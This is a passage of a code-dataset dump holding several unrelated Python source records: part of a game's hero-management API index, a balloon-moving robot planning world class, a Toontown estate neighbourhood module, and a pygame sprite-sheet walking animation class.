"0", "api": [{"api_name": "core.mongoscheme.MongoHero.objects.filter", "line_number": 25, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoHero", "line_number": 25, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 43, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.attack", "line_number": 45, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 45, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.defense", "line_number": 46, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 46, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 46, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.hp", "line_number": 47, "usage_type": "call"}, {"api_name": 
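save_hero() in the record above quietly converts already-owned heroes into souls instead of duplicating them. A minimal sketch of just that split, with the Mongo and signal plumbing stripped out (the function name and data shapes are assumptions; in the record the per-hero counts are then scaled by external_calculate.Hero.step_up_using_soul_amount):

def split_new_and_souls(owned_oids, incoming_oids):
    # Already-owned original ids become souls (counted); the rest stay heroes.
    new_heros, to_souls = [], {}
    for oid in incoming_oids:
        if oid in owned_oids:
            to_souls[oid] = to_souls.get(oid, 0) + 1
        else:
            new_heros.append(oid)
    return new_heros, to_souls

assert split_new_and_souls({1, 2}, [1, 3, 1, 4]) == ([3, 4], {1: 2})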
"dll.external_calculate.Hero", "line_number": 47, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 47, "usage_type": "name"}, {"api_name": "preset.data.MONSTERS", "line_number": 53, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.attack", "line_number": 55, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 55, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 55, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.defense", "line_number": 56, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 56, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 56, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.hp", "line_number": 57, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 57, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 57, "usage_type": "name"}, {"api_name": "core.mongoscheme.MongoHero.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoHero", "line_number": 73, "usage_type": "name"}, {"api_name": "core.mongoscheme.MongoCharacter.objects.get", "line_number": 74, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoCharacter.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoCharacter", "line_number": 74, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 86, "usage_type": "name"}, {"api_name": "core.formation.Formation", "line_number": 100, "usage_type": "call"}, {"api_name": "core.item.Equipment", "line_number": 110, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoAchievement.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoAchievement.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoAchievement", "line_number": 150, "usage_type": "name"}, {"api_name": "mongoengine.DoesNotExist", "line_number": 151, "usage_type": "name"}, {"api_name": "preset.data.ACHIEVEMENTS", "line_number": 156, "usage_type": "name"}, {"api_name": "utils.cache.set", "line_number": 174, "usage_type": "call"}, {"api_name": "utils.cache", "line_number": 174, "usage_type": "name"}, {"api_name": "utils.cache.get", "line_number": 178, "usage_type": "call"}, {"api_name": "utils.cache", "line_number": 178, "usage_type": "name"}, {"api_name": "{'Equipment': 'core.item.Equipment'}", "line_number": 182, "usage_type": "call"}, {"api_name": "preset.settings.HERO_MAX_STEP", "line_number": 190, "usage_type": "name"}, {"api_name": "preset.settings.HERO_STEP_UP_SOCKET_AMOUNT", "line_number": 192, "usage_type": "name"}, {"api_name": "preset.settings.HERO_MAX_STEP", "line_number": 202, "usage_type": "name"}, {"api_name": "core.exception.SanguoException", "line_number": 203, "usage_type": "call"}, {"api_name": "preset.errormsg.HERO_REACH_MAX_STEP", "line_number": 204, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 204, "usage_type": "name"}, {"api_name": "preset.settings.HERO_MAX_STEP", "line_number": 207, "usage_type": "argument"}, {"api_name": "dll.external_calculate.Hero.step_up_using_gold", "line_number": 211, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 211, "usage_type": "attribute"}, {"api_name": 
"dll.external_calculate", "line_number": 211, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.step_up_using_soul_amount", "line_number": 214, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 214, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 214, "usage_type": "name"}, {"api_name": "core.resource.Resource", "line_number": 227, "usage_type": "call"}, {"api_name": "core.exception.SanguoException", "line_number": 230, "usage_type": "name"}, {"api_name": "preset.errormsg.SOUL_NOT_ENOUGH", "line_number": 231, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 231, "usage_type": "name"}, {"api_name": "preset.errormsg.STUFF_NOT_ENOUGH", "line_number": 231, "usage_type": "attribute"}, {"api_name": "core.exception.SanguoException", "line_number": 232, "usage_type": "call"}, {"api_name": "preset.errormsg.HERO_STEP_UP_ALL_NOT_ENOUGH", "line_number": 233, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 233, "usage_type": "name"}, {"api_name": "core.signals.hero_step_up_signal.send", "line_number": 248, "usage_type": "call"}, {"api_name": "core.signals.hero_step_up_signal", "line_number": 248, "usage_type": "name"}, {"api_name": "core.signals.hero_changed_signal.send", "line_number": 257, "usage_type": "call"}, {"api_name": "core.signals.hero_changed_signal", "line_number": 257, "usage_type": "name"}, {"api_name": "core.mongoscheme.MongoHeroSoul.objects.get", "line_number": 267, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHeroSoul.objects", "line_number": 267, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoHeroSoul", "line_number": 267, "usage_type": "name"}, {"api_name": "mongoengine.DoesNotExist", "line_number": 268, "usage_type": "name"}, {"api_name": "core.mongoscheme.MongoHeroSoul", "line_number": 269, "usage_type": "call"}, {"api_name": "protomsg.AddHeroSoulNotify", "line_number": 293, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 299, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 299, "usage_type": "call"}, {"api_name": "protomsg.UpdateHeroSoulNotify", "line_number": 302, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 308, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 308, "usage_type": "call"}, {"api_name": "core.exception.SanguoException", "line_number": 316, "usage_type": "call"}, {"api_name": "preset.errormsg.SOUL_NOT_ENOUGH", "line_number": 317, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 317, "usage_type": "name"}, {"api_name": "protomsg.RemoveHeroSoulNotify", "line_number": 334, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 337, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 337, "usage_type": "call"}, {"api_name": "protomsg.UpdateHeroSoulNotify", "line_number": 340, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 346, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 346, "usage_type": "call"}, {"api_name": "protomsg.RemoveHeroSoulNotify", "line_number": 353, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 355, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 355, "usage_type": "call"}, {"api_name": "protomsg.HeroSoulNotify", "line_number": 359, "usage_type": "call"}, {"api_name": 
"core.msgpipe.publish_to_char", "line_number": 365, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 365, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero.objects.filter", "line_number": 387, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero.objects", "line_number": 387, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoHero", "line_number": 387, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 405, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.step_up_using_soul_amount", "line_number": 409, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 409, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 409, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 409, "usage_type": "name"}, {"api_name": "core.signals.hero_to_soul_signal.send", "line_number": 414, "usage_type": "call"}, {"api_name": "core.signals.hero_to_soul_signal", "line_number": 414, "usage_type": "name"}, {"api_name": "utils.functional.id_generator", "line_number": 423, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero", "line_number": 425, "usage_type": "call"}, {"api_name": "preset.settings.HERO_START_STEP", "line_number": 425, "usage_type": "name"}, {"api_name": "core.signals.hero_add_signal.send", "line_number": 427, "usage_type": "call"}, {"api_name": "core.signals.hero_add_signal", "line_number": 427, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 443, "usage_type": "name"}, {"api_name": "core.exception.SanguoException", "line_number": 444, "usage_type": "call"}, {"api_name": "preset.errormsg.SOUL_CAN_NOT_RECRUIT", "line_number": 445, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 445, "usage_type": "name"}, {"api_name": "core.exception.SanguoException", "line_number": 453, "usage_type": "call"}, {"api_name": "preset.errormsg.SOUL_CAN_NOT_RECRUIT", "line_number": 454, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 454, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.step_up_using_soul_amount", "line_number": 461, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 461, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 461, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 461, "usage_type": "name"}]} {"seq_id": "151801508", "text": "from json import load\nfrom copy import deepcopy\nfrom math import sqrt\n\ndef parse_json(file):\n located = {}\n on = {}\n\n #open json file for initial world\n f = open(file)\n fdata = load(f)\n\n #goes through each key from json file \n for key in fdata.keys():\n #set the world \n located[key] = fdata[key]\n on[key] = 'floor'\n\n return located, on \n\ndef distance(tuple1,tuple2): \n return sqrt((tuple1[0]-tuple2[0])**2 + (tuple1[1]-tuple2[1])**2)\n\nclass World:\n\n def __init__(self, world_file, robot_loc):\n self.located, self.on = parse_json(world_file)\n self.located['Robot'] = robot_loc\n self.cost = 0\n self.onRobot = 0\n self.action = None\n \n # returns list of drive successors\n def drive(self):\n successors = []\n if self.checkRobot(): \n #drive to each ballon locations\n curr_robot_loc = self.located['Robot']\n #drive to each balloon's location\n for eachKey in self.located.keys(): \n if eachKey is not 'Robot' :\n #get location of the ballon \n new_robot_loc = self.located[eachKey]\n #make copy of this 
self \n                    temp = deepcopy(self)\n                    #update the location (simulate the drive)\n                    temp.located['Robot'] = new_robot_loc\n                    # assign action to world\n                    temp.action = ('drive', new_robot_loc)\n                    #cost is the actual distance driven from the robot's current location \n                    temp.updateCost(distance(curr_robot_loc,new_robot_loc))\n                    #append temp to allSuccessors \n                    successors.append(temp)\n            \n        return successors\n\n    def pickup1(self):\n        successors = []\n        for eachKey in self.located.keys():\n            if (eachKey != 'Robot') and (self.on[eachKey] == 'floor') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot == 1:\n                #pick up a second balloon (update what the balloon is on)\n                #make copy of this self \n                temp = deepcopy(self)\n                # add to onRobot\n                temp.onRobot += 1\n                #change status of balloon\n                temp.on[eachKey] = 'Robot'\n                # assign action to world\n                temp.action = ('pickup', None)\n                #update cost of picking up a second balloon\n                temp.updateCost(5)\n                #append temp to allSuccessors \n                successors.append(temp)\n\n        return successors\n    \n    def pickup2(self):\n        successors = []\n        for eachKey in self.located.keys():\n            if (eachKey != 'Robot') and (self.on[eachKey] == 'floor') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot == 0:\n                #pick up the first balloon (update what the balloon is on)\n                #make copy of this self \n                temp = deepcopy(self)\n                # add to onRobot\n                temp.onRobot += 1\n                # update on\n                temp.on[eachKey] = 'Robot'\n                # assign action to world\n                temp.action = ('pickup', None)\n                #update cost of picking up the first balloon \n                temp.updateCost(7)\n                #append temp to allSuccessors \n                successors.append(temp)\n\n        return successors\n    \n    def putdown(self):\n        successors = []\n        for eachKey in self.located.keys():\n            if (eachKey != 'Robot') and (self.on[eachKey] == 'Robot') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot > 0:\n                #make copy of this self \n                temp = deepcopy(self)\n                #update the location \n                temp.located[eachKey] = temp.located['Robot']\n                # update status \n                temp.on[eachKey] = 'floor'\n                # one fewer balloon carried by the robot\n                temp.onRobot -= 1\n                # assign action to world\n                temp.action = ('putdown', None)\n                #update cost of putting down a balloon \n                temp.updateCost(5)\n                #append temp to allSuccessors \n                successors.append(temp)\n\n        return successors\n\n    def checkRobot (self): \n        if 'Robot' in self.located.keys(): \n            return True \n        return False \n\n    def getOn(self): \n        return self.on\n\n    def getLocated(self): \n        return self.located \n    \n    def robotHasBalloon(self,lookAt): \n        for eachKey in self.on.keys(): \n            if (eachKey != lookAt) and (self.on[eachKey] == 'Robot'):\n                return True \n        return False \n\n    def updateCost(self,number):\n        self.cost = number\n\n    def getSuccessors(self):\n        #list of all successors \n        allSuccessors = [] \n\n        #1. 
add drive action successors \n        allSuccessors.extend(self.drive())\n\n        #2.Check if robot can pick up a second balloon (any color)\n        allSuccessors.extend(self.pickup1())\n        \n        #3.Check if robot can pick up a first balloon (any color) when carrying none\n        allSuccessors.extend(self.pickup2())\n\n        #4.Check if robot can put down a balloon\n        allSuccessors.extend(self.putdown())\n\n        return allSuccessors\n\n    def distanceFromGoal(self, goal_locations):\n        '''\n        A heuristic that sums the distances of the balloons between where they are and where they should be \n        \n        goal_locations: a dictionary of the final balloon locations, e.g. {'Red': (5, 7), ...}\n        '''\n        sum_ = 0\n        for balloon in goal_locations.keys():\n            sum_ += distance(self.located[balloon], goal_locations[balloon])\n        \n        return sum_\n\n    def getAction(self):\n        return self.action\n\n    def printWorld(self):\n        print(\"this is where everything is located \", self.located)\n        print(\"this is what everything is on \", self.on)\n        print(\"cost to get to this world is \", self.cost)\n    \n\n############ end of world class ###############\n\n\n\n\nw = World('simple.json', (1,3))\nw.printWorld()\nallChildren = w.getSuccessors()\nfor i in allChildren:\n    i.printWorld()\n\n\n\n", "sub_path": "actionPlaning/world-1.py", "file_name": "world-1.py", "file_ext": "py", "file_size_in_byte": 6159, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "json.load", "line_number": 11, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 22, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 45, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 83, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 102, "usage_type": "call"}]} {"seq_id": "645047200", "text": "# File: t (Python 2.2)\n\nfrom direct.showbase.ShowBaseGlobal import *\nfrom toontown.toonbase.ToonBaseGlobal import *\nfrom toontown.toonbase.ToontownGlobals import *\nfrom toontown.distributed.ToontownMsgTypes import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom direct.fsm import ClassicFSM\nfrom direct.fsm import State\nfrom toontown.minigame import Purchase\nfrom otp.avatar import DistributedAvatar\nimport SkyUtil\nimport Hood\nfrom toontown.estate import EstateLoader\nfrom toontown.estate import HouseGlobals\nimport ZoneUtil\n\nclass EstateHood(Hood.Hood):\n    notify = DirectNotifyGlobal.directNotify.newCategory('EstateHood')\n    \n    def __init__(self, parentFSM, doneEvent, dnaStore, hoodId):\n        Hood.Hood.__init__(self, parentFSM, doneEvent, dnaStore, hoodId)\n        self.fsm = ClassicFSM.ClassicFSM('Hood', [\n            State.State('start', self.enterStart, self.exitStart, [\n                'safeZoneLoader']),\n            State.State('safeZoneLoader', self.enterSafeZoneLoader, self.exitSafeZoneLoader, [\n                'quietZone']),\n            State.State('quietZone', self.enterQuietZone, self.exitQuietZone, [\n                'safeZoneLoader']),\n            State.State('final', self.enterFinal, self.exitFinal, [])], 'start', 'final')\n        self.fsm.enterInitialState()\n        self.id = MyEstate\n        self.safeZoneLoaderClass = EstateLoader.EstateLoader\n        self.storageDNAFile = 'phase_5.5/dna/storage_estate.dna'\n        self.holidayStorageDNADict = {\n            WINTER_DECORATIONS: [\n                'phase_5.5/dna/winter_storage_estate.dna'] }\n        self.skyFile = 'phase_3.5/models/props/TT_sky'\n        self.popupInfo = None\n\n    \n    def load(self):\n        Hood.Hood.load(self)\n\n    \n    def unload(self):\n        del self.safeZoneLoaderClass\n        if self.popupInfo:\n            
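The World class in the world-1.py record above exposes successor generation, per-action step costs, and a Euclidean distanceFromGoal() heuristic, but no search driver. A hypothetical greedy best-first loop over that interface; this is a sketch, not code from the record, and the step cap is its only guard against cycling:

def greedy_plan(start_world, goal_locations, max_steps=50):
    # Repeatedly expand the child that minimizes step cost + heuristic.
    plan, world = [], start_world
    for _ in range(max_steps):
        if world.distanceFromGoal(goal_locations) < 1e-9:
            return plan
        world = min(world.getSuccessors(),
                    key=lambda w: w.cost + w.distanceFromGoal(goal_locations))
        plan.append(world.getAction())
    return plan

# e.g. greedy_plan(World('simple.json', (1, 3)), {'Red': (5, 7)})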
self.popupInfo.destroy()\n self.popupInfo = None\n \n if not wantOtpServer:\n base.cr.disableAll()\n \n Hood.Hood.unload(self)\n\n \n def enter(self, requestStatus):\n hoodId = requestStatus['hoodId']\n zoneId = requestStatus['zoneId']\n self.accept('kickToPlayground', self.kickToPlayground)\n self.fsm.request(requestStatus['loader'], [\n requestStatus])\n\n \n def exit(self):\n if self.loader:\n self.loader.exit()\n self.loader.unload()\n del self.loader\n \n Hood.Hood.exit(self)\n\n \n def loadLoader(self, requestStatus):\n loaderName = requestStatus['loader']\n if loaderName == 'safeZoneLoader':\n self.loader = self.safeZoneLoaderClass(self, self.fsm.getStateNamed('safeZoneLoader'), self.loaderDoneEvent)\n self.loader.load()\n \n\n \n def spawnTitleText(self, zoneId):\n return None\n\n \n def hideTitleTextTask(self, task):\n return Task.done\n\n \n def kickToPlayground(self, retCode):\n if retCode == 0:\n msg = TTLocalizer.EstateOwnerLeftMessage % HouseGlobals.BOOT_GRACE_PERIOD\n self._EstateHood__popupKickoutMessage(msg)\n elif retCode == 1:\n zoneId = base.localAvatar.lastHood\n self.doneStatus = {\n 'loader': ZoneUtil.getBranchLoaderName(zoneId),\n 'where': ZoneUtil.getToonWhereName(zoneId),\n 'how': 'teleportIn',\n 'hoodId': zoneId,\n 'zoneId': zoneId,\n 'shardId': None,\n 'avId': -1 }\n messenger.send(self.doneEvent)\n elif retCode == 2:\n zoneId = base.localAvatar.lastHood\n self.doneStatus = {\n 'loader': ZoneUtil.getBranchLoaderName(zoneId),\n 'where': ZoneUtil.getToonWhereName(zoneId),\n 'how': 'teleportIn',\n 'hoodId': zoneId,\n 'zoneId': zoneId,\n 'shardId': None,\n 'avId': -1 }\n messenger.send(self.doneEvent)\n else:\n self.notify.error('unknown reason for exiting estate')\n\n \n def _EstateHood__popupKickoutMessage(self, msg):\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n \n buttons = loader.loadModelOnce('phase_3/models/gui/dialog_box_buttons_gui')\n okButtonImage = (buttons.find('**/ChtBx_OKBtn_UP'), buttons.find('**/ChtBx_OKBtn_DN'), buttons.find('**/ChtBx_OKBtn_Rllvr'))\n self.popupInfo = DirectFrame(parent = hidden, relief = None, state = 'normal', text = msg, frameSize = (-1, 1, -1, 1), text_wordwrap = 10, geom = getDefaultDialogGeom(), geom_color = GlobalDialogColor, geom_scale = (0.88, 1, 0.75), geom_pos = (0, 0, -0.080000000000000002), text_scale = 0.080000000000000002, text_pos = (0, 0.10000000000000001))\n DirectButton(self.popupInfo, image = okButtonImage, relief = None, text = TTLocalizer.EstatePopupOK, text_scale = 0.050000000000000003, text_pos = (0.0, -0.10000000000000001), textMayChange = 0, pos = (0.0, 0.0, -0.29999999999999999), command = self._EstateHood__handleKickoutOk)\n buttons.removeNode()\n self.popupInfo.reparentTo(aspect2d)\n\n \n def _EstateHood__handleKickoutOk(self):\n self.popupInfo.reparentTo(hidden)\n\n \n def skyTrack(self, task):\n return SkyUtil.cloudSkyTrack(task)\n\n \n def startSky(self):\n SkyUtil.startCloudSky(self)\n if base.cloudPlatformsEnabled:\n self.loader.startCloudPlatforms()\n \n\n \n def stopSky(self):\n Hood.Hood.stopSky(self)\n self.loader.stopCloudPlatforms()\n\n\n", "sub_path": "toontown/hood/EstateHood.py", "file_name": "EstateHood.py", "file_ext": "py", "file_size_in_byte": 5596, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "Hood.Hood", "line_number": 18, "usage_type": "attribute"}, {"api_name": "direct.directnotify.DirectNotifyGlobal.directNotify.newCategory", "line_number": 19, "usage_type": "call"}, 
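EstateHood above wires a Panda3D ClassicFSM in which each state lists the states it may legally move to (start -> safeZoneLoader <-> quietZone). A pure-Python stand-in for that transition-guard idea, sketching the shape of the API rather than Panda3D's actual implementation:

class TinyFSM:
    def __init__(self, transitions, initial):
        self.transitions = transitions  # state name -> allowed next states
        self.state = initial

    def request(self, name):
        if name not in self.transitions[self.state]:
            raise ValueError('illegal transition %s -> %s' % (self.state, name))
        self.state = name

hood = TinyFSM({'start': ['safeZoneLoader'],
                'safeZoneLoader': ['quietZone'],
                'quietZone': ['safeZoneLoader']}, 'start')
hood.request('safeZoneLoader')  # mirrors EstateHood.enter() requesting the loader state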
{"api_name": "direct.directnotify.DirectNotifyGlobal.directNotify", "line_number": 19, "usage_type": "attribute"}, {"api_name": "direct.directnotify.DirectNotifyGlobal", "line_number": 19, "usage_type": "name"}, {"api_name": "Hood.Hood.__init__", "line_number": 22, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 22, "usage_type": "attribute"}, {"api_name": "direct.fsm.ClassicFSM.ClassicFSM", "line_number": 23, "usage_type": "call"}, {"api_name": "direct.fsm.ClassicFSM", "line_number": 23, "usage_type": "name"}, {"api_name": "direct.fsm.State.State", "line_number": 24, "usage_type": "call"}, {"api_name": "direct.fsm.State", "line_number": 24, "usage_type": "name"}, {"api_name": "direct.fsm.State.State", "line_number": 26, "usage_type": "call"}, {"api_name": "direct.fsm.State", "line_number": 26, "usage_type": "name"}, {"api_name": "direct.fsm.State.State", "line_number": 28, "usage_type": "call"}, {"api_name": "direct.fsm.State", "line_number": 28, "usage_type": "name"}, {"api_name": "direct.fsm.State.State", "line_number": 30, "usage_type": "call"}, {"api_name": "direct.fsm.State", "line_number": 30, "usage_type": "name"}, {"api_name": "toontown.estate.EstateLoader.EstateLoader", "line_number": 33, "usage_type": "attribute"}, {"api_name": "toontown.estate.EstateLoader", "line_number": 33, "usage_type": "name"}, {"api_name": "Hood.Hood.load", "line_number": 43, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 43, "usage_type": "attribute"}, {"api_name": "Hood.Hood.unload", "line_number": 55, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 55, "usage_type": "attribute"}, {"api_name": "Hood.Hood.exit", "line_number": 72, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 72, "usage_type": "attribute"}, {"api_name": "toontown.estate.HouseGlobals.BOOT_GRACE_PERIOD", "line_number": 93, "usage_type": "attribute"}, {"api_name": "toontown.estate.HouseGlobals", "line_number": 93, "usage_type": "name"}, {"api_name": "ZoneUtil.getBranchLoaderName", "line_number": 98, "usage_type": "call"}, {"api_name": "ZoneUtil.getToonWhereName", "line_number": 99, "usage_type": "call"}, {"api_name": "ZoneUtil.getBranchLoaderName", "line_number": 109, "usage_type": "call"}, {"api_name": "ZoneUtil.getToonWhereName", "line_number": 110, "usage_type": "call"}, {"api_name": "SkyUtil.cloudSkyTrack", "line_number": 139, "usage_type": "call"}, {"api_name": "SkyUtil.startCloudSky", "line_number": 143, "usage_type": "call"}, {"api_name": "Hood.Hood.stopSky", "line_number": 150, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 150, "usage_type": "attribute"}]} {"seq_id": "75647117", "text": "import pygame\r\nimport random\r\n\r\nglobal BLACK, WHITE, BLUE, SCREEN_WIDTH, SCREEN_HEIGHT, GAME_FLOOR\r\n\r\n#set up constants for screen dimensions and colours\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\nBLUE = (0,0,255)\r\n\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 600\r\nGAME_FLOOR = SCREEN_HEIGHT-100\r\n\r\n#create an object to act as a reference for our spritesheet\r\nclass SpriteSheet(object):\r\n\tdef __init__(self, filename):\r\n\t\t#load the spritesheet specified by filename \r\n\t\tself.sprite_sheet = pygame.image.load(filename).convert()\r\n\t\t#get dimension information for the sprite sheet\r\n\t\tself.rect = self.sprite_sheet.get_rect()\r\n\r\n\t#this function returns a section of the spritesheet as an image\r\n\tdef get_image(self,x,y,width,height):\r\n\t\t#create a blank surface to contain the sprite we're going to pull from the 
spritesheet\r\n\t\timage = pygame.Surface([width,height]).convert()\r\n\t\t#copy the specified section of spritesheet to the \"image\" surface\r\n\t\timage.blit(self.sprite_sheet, (0,0), (x, y, width, height))\r\n\t\t#set the colour key of the sprite that's going to be returned\r\n\t\timage.set_colorkey(WHITE)\r\n\t\t#return back the section of the sprite sheet we've specified\r\n\t\treturn image\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n\t#set up two values to use to move the sprite along x and y axis\r\n\t#0 means the sprite isn't moving along that axis.\r\n\tchange_x = 0\r\n\tchange_y = 0\r\n\r\n\t#these arrays are to be used to contain the frames for the walk cycle\r\n\twalking_frames_left = []\r\n\twalking_frames_right = []\r\n\tdirection = \"R\"\r\n\r\n\tdef __init__(self):\r\n\t\tpygame.sprite.Sprite.__init__(self)\r\n\t\t#load the sprite sheet\r\n\t\tsprite_sheet = SpriteSheet(\"bret_run_sprite_sheet.png\")\r\n\t\t#specify how many frames are contained in the sprite sheet\r\n\t\tframes_in_walk_cycle=8\r\n\t\t#work out the width of each individual frame (integer division keeps it a whole number of pixels)\r\n\t\tsprite_width=sprite_sheet.rect.width // frames_in_walk_cycle\r\n\t\t#as all sprites are on one line the height of each frame is the same as the sprite sheet\r\n\t\tsprite_height=sprite_sheet.rect.height\r\n\t\t\r\n\t\t#cycle through each frame in sprite sheet\r\n\t\tfor i in range(frames_in_walk_cycle):\r\n\t\t\t#assign current frame to a temporary frame image\r\n\t\t\ttemp_frame = sprite_sheet.get_image(i * sprite_width, 0, sprite_width, sprite_height)\r\n\t\t\t#add current frame to array of right-facing walking frame images\r\n\t\t\tself.walking_frames_right.append(temp_frame)\r\n\t\t\t#flip frame over on x-axis to get left facing image\r\n\t\t\ttemp_frame = pygame.transform.flip(temp_frame, True, False)\r\n\t\t\t#add current frame to array of left-facing walking frame images\r\n\t\t\tself.walking_frames_left.append(temp_frame)\r\n\r\n\t\t#set initial frame image\r\n\t\tself.image = self.walking_frames_right[0]\r\n\r\n\t\t#create rectangle object to hold frame info\r\n\t\tself.rect = self.image.get_rect()\r\n\r\n\tdef update(self):\r\n\t\t\r\n\t\t#move left/right\r\n\t\tself.fall_from_jump()\r\n\t\tself.rect.x += self.change_x\r\n\t\tpos = self.rect.x\r\n\t\t\r\n\t\t#set how many pixels we need to move by before walk cycle frame changes\r\n\t\tpixels_per_frame=30\r\n\r\n\t\t# This determines what the current walk cycle frame is. 
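SpriteSheet.get_image() above cuts frame i out of a one-row sheet at x = i * frame_width, which is how Player.__init__ slices its 8-frame run cycle. The same arithmetic in isolation (the sheet dimensions are made up):

def frame_rect(i, sheet_width, sheet_height, frames=8):
    # Source rectangle (x, y, w, h) of frame i on a single-row sprite sheet.
    frame_width = sheet_width // frames
    return (i * frame_width, 0, frame_width, sheet_height)

assert frame_rect(3, 800, 64) == (300, 0, 100, 64)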
This is a bit of a fudge -\r\n\t\t# basically every position in the 'game world' has a walk cycle frame assigned to it\r\n\t\t# - this is worked out by dividing the current position (pos) by the number of pixels we\r\n\t\t# need to move by before the frame changes (pixels_per_frame) - to ensure that this always\r\n\t\t# gives a value within the range of walk cycle frames available, we divide that number by\r\n\t\t# the number of frames available and set the current frame to the remainder (done using 'modulus')\r\n\t\t\r\n\t\tif self.direction == \"R\": # if heading right, use the right-facing frames\r\n\t\t\tframe = (pos // pixels_per_frame) % len(self.walking_frames_right)\r\n\t\t\tself.image = self.walking_frames_right[frame]\r\n\t\telse: # otherwise use the left-facing frames\r\n\t\t\tframe = (pos // pixels_per_frame) % len(self.walking_frames_left)\r\n\t\t\tself.image = self.walking_frames_left[frame]\r\n\r\n\t\t# Move up/down\r\n\t\tself.rect.y += self.change_y\r\n\t\t\t\r\n\t# if player directs character to go left, then change x position by -6\r\n\tdef go_left(self):\r\n\t\tself.change_x = -6\r\n\t\tself.direction = \"L\"\r\n\t\r\n\t# if player directs character to go right, then change x position by +6\r\n\tdef go_right(self):\r\n\t\tself.change_x = 6\r\n\t\tself.direction = 